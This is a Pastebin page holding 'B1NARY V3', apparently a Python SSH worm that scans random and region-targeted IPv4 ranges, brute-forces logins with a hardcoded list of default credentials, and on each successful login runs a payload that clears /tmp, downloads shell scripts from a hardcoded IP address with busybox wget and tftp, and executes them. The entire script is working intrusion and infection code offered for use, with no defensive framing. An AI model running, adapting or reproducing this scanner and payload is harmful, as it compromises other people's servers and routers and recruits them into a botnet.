Advertisement
Guest User

scan.py

a guest
Oct 12th, 2016
339
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 18.05 KB | None | 0 0
  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-
  3. #MUST INSTALL PARAMIKO
  4. #yum install python-paramiko -y
  5. """
  6. Usage: python b1naryv3.py [threads] [A|B|C|BRAZIL|SUPER|LUCKY|LUCKY2|RAND|INTERNET] [IPRANGE] [1|2|routers|perl|ubuntu|root|vps1|vps2|vps3|r00ted]
  7. Skype: bl4ck.j3sus
  8. XMPP: b1nary@darkness.su
  9. Made Date: 6-16-16
  10. """
  11. """
  12.  
  13. # ___ __________ ____ _______ _____ _______________.___. ___
  14. # / _ \_/\ \______ \/_ |\ \ / _ \\______ \__ | | / _ \_/\
  15. # \/ \___/ | | _/ | |/ | \ / /_\ \| _// | | \/ \___/
  16. # | | \ | / | \/ | \ | \\____ |
  17. # |______ / |___\____|__ /\____|__ /____|_ // ______|
  18. # \/ \/ \/ \/ \/
  19. ***B1NARY V3***
  20. """
  21. import threading, random, socket, time, sys, os
  22. usage='python b1naryv3.py [threads] [A|B|C|BRAZIL|SUPER|LUCKY|LUCKY2|RAND|INTERNET] [IPRANGE] [1|2|routers|perl|ubuntu|root|vps1|vps2|vps3|r00ted]'
  23. if len(sys.argv) < 4:
  24. sys.exit(usage)
  25. os.system("echo -e 'ulimit -s 999999; ulimit -n 999999; ulimit -u 999999\n' > ~/.bashrc")
  26. os.system("ulimit -s 999999; ulimit -n 999999; ulimit -u 999999")
  27. paramiko.util.log_to_file("/dev/null")
  28. os.system("sysctl -w fs.file-max=999999 >/dev/null")
  29.  
  30. """
  31. ████████▄ ▄████████ ▄████████ ▄█ ███▄▄▄▄ ▄████████ ▄████████
  32. ███ ▀███ ███ ███ ███ ███ ███ ███▀▀▀██▄ ███ ███ ███ ███
  33. ███ ███ ███ █▀ ███ █▀ ███▌ ███ ███ ███ █▀ ███ █▀
  34. ███ ███ ▄███▄▄▄ ▄███▄▄▄ ███▌ ███ ███ ▄███▄▄▄ ███
  35. ███ ███ ▀▀███▀▀▀ ▀▀███▀▀▀ ███▌ ███ ███ ▀▀███▀▀▀ ▀███████████
  36. ███ ███ ███ █▄ ███ ███ ███ ███ ███ █▄ ███
  37. ███ ▄███ ███ ███ ███ ███ ███ ███ ███ ███ ▄█ ███
  38. ████████▀ ██████████ ███ █▀ ▀█ █▀ ██████████ ▄████████▀
  39. """
  40. cmd='cd /tmp; rm -rf *;busybox wget -q http://208.67.1.183/gtop.sh; chmod +x gtop.sh; sh gtop.sh; rm -rf *; busybox tftp -r tftp.sh -g ; sh tftp.sh; busybox tftp -c get tftp2.sh; sh tftp2.sh\r\n' #PAYLOAD
  41. blacklist = [
  42. '127'
  43. ]
  44. passwords = [
  45. "root:root",
  46. "root:toor",
  47. "root:admin",
  48. "root:1234",
  49. "root:maxided",
  50. "root:pi",
  51. "root:alpine",
  52. "root:r00tnull3d",
  53. "root:r00tnull3d#",
  54. "root:rootnull3d#",
  55. "root:password",
  56. "root:centos6svm",
  57. "root:1234",
  58. "root:123456",
  59. "root:Love2020",
  60. "root:Zero",
  61. "root:Password",
  62. "root:password",
  63. "root:qwerty",
  64. "root:dragon",
  65. "root:pussy",
  66. "root:baseball",
  67. "root:football",
  68. "root:monkey",
  69. "root:696969",
  70. "root:abc123"
  71. "admin:admin",
  72. "admin:1234",
  73. "admin:Guest",
  74. "ubnt:ubnt",
  75. "guest:guest",
  76. "user:user",
  77. "test:test",
  78. "pi:raspberry",
  79. "vagrant:vagrant",
  80. "localhost:root",
  81. "B1NARY:B1NARY",
  82. "tim:tim",
  83. "CISCO:CISCO",
  84. "netgear"
  85. "support:support",
  86. "oracle:oracle",
  87. "cusadmin:password",
  88. ]
  89.  
  90. """
  91. ▄█ ▄███████▄ ▄████████ ▄████████ ▄██████▄ ███▄▄▄▄ ▄████████ ▄████████
  92. ███ ███ ███ ███ ███ ███ ███ ███ ███ ███▀▀▀██▄ ███ ███ ███ ███
  93. ███▌ ███ ███ ███ ███ ███ ███ ███ █▀ ███ ███ ███ █▀ ███ █▀
  94. ███▌ ███ ███ ▄███▄▄▄▄██▀ ███ ███ ▄███ ███ ███ ▄███▄▄▄ ███
  95. ███▌ ▀█████████▀ ▀▀███▀▀▀▀▀ ▀███████████ ▀▀███ ████▄ ███ ███ ▀▀███▀▀▀ ▀███████████
  96. ███ ███ ▀███████████ ███ ███ ███ ███ ███ ███ ███ █▄ ███
  97. ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ▄█ ███
  98. █▀ ▄████▀ ███ ███ ███ █▀ ████████▀ ▀█ █▀ ██████████ ▄████████▀
  99. ███ ███
  100. """
  101. br = ["179.105","179.152","189.29","189.32","189.33","189.34","189.35","189.39","189.4","189.54","189.55","189.60","189.61","189.62","189.63","189.126"]
  102. yeet = ["122","131","161","37","186","187","31","188","201","2","200"]
  103. lucky = ["125.24","125.25","125.26","125.27","125.28","113.53","101.51","101.108","118.175","118.173","182.52","180.180"]
  104. lucky2 = ["119.91","119.92","119.93","113.53"]
  105. lol = ["1","2","5","119","180","113","125","122","46","101",""]
  106.  
  107. """
  108. ▄███████▄ ▄████████ ▄████████ ▄████████ ▄████████ ▄██████▄ ▄▄▄▄███▄▄▄▄ ▀█████████▄ ▄██████▄ ▄████████
  109. ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ▄██▀▀▀███▀▀▀██▄ ███ ███ ███ ███ ███ ███
  110. ███ ███ ███ ███ ███ █▀ ███ █▀ ███ █▀ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ █▀
  111. ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ▄███▄▄▄██▀ ███ ███ ███
  112. ▀█████████▀ ▀███████████ ▀███████████ ▀███████████ ███ ███ ███ ███ ███ ███ ▀▀███▀▀▀██▄ ███ ███ ▀███████████
  113. ███ ███ ███ ███ ███ ███ █▄ ███ ███ ███ ███ ███ ███ ██▄ ███ ███ ███
  114. ███ ███ ███ ▄█ ███ ▄█ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ▄█ ███
  115. ▄████▀ ███ █▀ ▄████████▀ ▄████████▀ ████████▀ ▀██████▀ ▀█ ███ █▀ ▄█████████▀ ▀██████▀ ▄████████▀
  116. """
  117.  
  118. if sys.argv[4] == '1':
  119. passwords = ["root:root", "root:admin", "admin:1234"]
  120. if sys.argv[4] == '2':
  121. passwords = ["root:root", "root:toor", "root:admin", "admin:1234", "oracle:oracle", "root:alpine"]
  122. if sys.argv[4] == 'routers':
  123. passwords = ["root:admin", "root:root", "admin:1234", "admin:password", "cisco:cisco", "netgear:netgear", "cusadmin:password"]
  124. if sys.argv[4] == 'perl':
  125. passwords = [ "pi:raspberry", "vagrant:vagrant", "ubnt:ubnt" ]
  126. if sys.argv[4] == 'ubuntu':
  127. passwords = [ "ubnt:ubnt", "ubnt:1234", "ubnt:password" ]
  128. if sys.argv[4] == 'root':
  129. passwords = [ "root:root","root:test" ]
  130. if sys.argv[4] == 'vps1':
  131. passwords = [ "root:maxided", "root:centos6svm", "root:123456", "root:Love2020", "root:Zero", "root:Password", "root:password"]
  132. if sys.argv[4] == 'vps2':
  133. passwords = [ "root:maxided", "root:centos6svm", "root:1234", "root:qwerty", "root:dragon", "root:pussy", "root:baseball"]
  134. if sys.argv[4] == 'vps3':
  135. passwords = [ "root:maxided", "root:centos6svm", "root:football", "root:monkey", "root:696969", "root:abc123"]
  136. if sys.argv[4] == 'r00ted':
  137. passwords = [ "localhost:root", "B1NARY:B1NARY", "root:r00tnull3d#", "root:Flunzy2016", "bash:root"]
  138. if sys.argv[4] == 'brute':
  139. passwords = [ "root:centos6svm", "root:root", "root:toor", "root:abc123"]
  140. if sys.argv[4] == 'lol':
  141. passwords = [ "admin:1234"]
  142.  
  143. """
  144. ▄█ ▄███████▄ ▄████████ ▄█ ▄████████ ▄████████ ▄████████ ▄████████ ▄████████
  145. ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███
  146. ███▌ ███ ███ ███ █▀ ███ ███ ███ ███ █▀ ███ █▀ ███ █▀ ███ █▀
  147. ███▌ ███ ███ ███ ███ ███ ███ ███ ███ ▄███▄▄▄ ███
  148. ███▌ ▀█████████▀ ███ ███ ▀███████████ ▀███████████ ▀███████████ ▀▀███▀▀▀ ▀███████████
  149. ███ ███ ███ █▄ ███ ███ ███ ███ ███ ███ █▄ ███
  150. ███ ███ ███ ███ ███▌ ▄ ███ ███ ▄█ ███ ▄█ ███ ███ ███ ▄█ ███
  151. █▀ ▄████▀ ████████▀ █████▄▄██ ███ █▀ ▄████████▀ ▄████████▀ ██████████ ▄████████▀
  152. """
  153. ipclassinfo = sys.argv[2]
  154. if ipclassinfo == "A":
  155. ip1 = sys.argv[3]
  156. elif ipclassinfo == "B":
  157. ip1 = sys.argv[3].split(".")[0]
  158. ip2 = sys.argv[3].split(".")[1]
  159. elif ipclassinfo == "C":
  160. ips = sys.argv[3].split(".")
  161. num=0
  162. for ip in ips:
  163. num=num+1
  164. if num == 1:
  165. ip1 = ip
  166. elif num == 2:
  167. ip2 = ip
  168. elif num == 3:
  169. ip3 = ip
  170. """
  171. ▄████████ ▄████████ ▄█ █▄ ▄████████ ▄████████ ▄████████ ███▄▄▄▄ ███▄▄▄▄ ▄████████ ▄████████
  172. ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███▀▀▀██▄ ███▀▀▀██▄ ███ ███ ███ ███
  173. ███ █▀ ███ █▀ ███ ███ ███ █▀ ███ █▀ ███ ███ ███ ███ ███ ███ ███ █▀ ███ ███
  174. ███ ███ ▄███▄▄▄▄███▄▄ ███ ███ ███ ███ ███ ███ ███ ███ ▄███▄▄▄ ▄███▄▄▄▄██▀
  175. ▀███████████ ▀███████████ ▀▀███▀▀▀▀███▀ ▀███████████ ███ ▀███████████ ███ ███ ███ ███ ▀▀███▀▀▀ ▀▀███▀▀▀▀▀
  176. ███ ███ ███ ███ ███ ███ █▄ ███ ███ ███ ███ ███ ███ ███ █▄ ▀███████████
  177. ▄█ ███ ▄█ ███ ███ ███ ▄█ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███
  178. ▄████████▀ ▄████████▀ ███ █▀ ▄████████▀ ████████▀ ███ █▀ ▀█ █▀ ▀█ █▀ ██████████ ███ ███
  179. ███ ███
  180. """
  181. class sshscanner(threading.Thread):
  182. global passwords
  183. global ipclassinfo
  184. if ipclassinfo == "A":
  185. global ip1
  186. elif ipclassinfo == "B":
  187. global ip1
  188. global ip2
  189. elif ipclassinfo == "C":
  190. global ip1
  191. global ip2
  192. global ip3
  193. def run(self):
  194. while 1:
  195. try:
  196. while 1:
  197. thisipisbad='no'
  198. if ipclassinfo == "A":
  199. self.host = ip1+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  200. elif ipclassinfo == "B":
  201. self.host = ip1+'.'+ip2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  202. elif ipclassinfo == "C":
  203. self.host = ip1+'.'+ip2+'.'+ip3+'.'+str(random.randrange(0,256))
  204. elif ipclassinfo == "BRAZIL":
  205. self.host = random.choice(br)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  206. elif ipclassinfo == "SUPER":
  207. self.host = random.choice(yeet)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  208. elif ipclassinfo == "LUCKY":
  209. self.host = random.choice(lucky)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  210. elif ipclassinfo == "LUCKY2":
  211. self.host = random.choice(lucky2)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  212. elif ipclassinfo == "RAND":
  213. self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  214. elif ipclassinfo == "INTERNET":
  215. self.host = random.choice(lol)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  216. else:
  217. self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  218. for badip in blacklist:
  219. if badip in self.host:
  220. thisipisbad='yes'
  221. if thisipisbad=='no':
  222. break
  223. username='root'
  224. password=""
  225. port = 22
  226. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  227. s.settimeout(3)
  228. s.connect((self.host, port))
  229. s.close()
  230. ssh = paramiko.SSHClient()
  231. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  232. dobreak=False
  233. for passwd in passwords:
  234. if ":n/a" in passwd:
  235. password=""
  236. else:
  237. password=passwd.split(":")[1]
  238. if "n/a:" in passwd:
  239. username=""
  240. else:
  241. username=passwd.split(":")[0]
  242. try:
  243. ssh.connect(self.host, port = port, username=username, password=password, timeout=3)
  244. dobreak=True
  245. break
  246. except:
  247. pass
  248. if True == dobreak:
  249. break
  250. badserver=True
  251. stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
  252. output = stdout.read()
  253. if "inet addr" in output:
  254. badserver=False
  255. if badserver == False:
  256. print '\x1b[31mINFECTING:'+self.host+'|'+username+'|'+password+'|'+str(port)
  257. ssh.exec_command(""+cmd+"")
  258. time.sleep(20)
  259. ssh.close()
  260. except:
  261. pass
  262.  
  263. for x in range(0,int(sys.argv[1])):
  264. try:
  265. t = sshscanner()
  266. t.start()
  267. except:
  268. pass
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement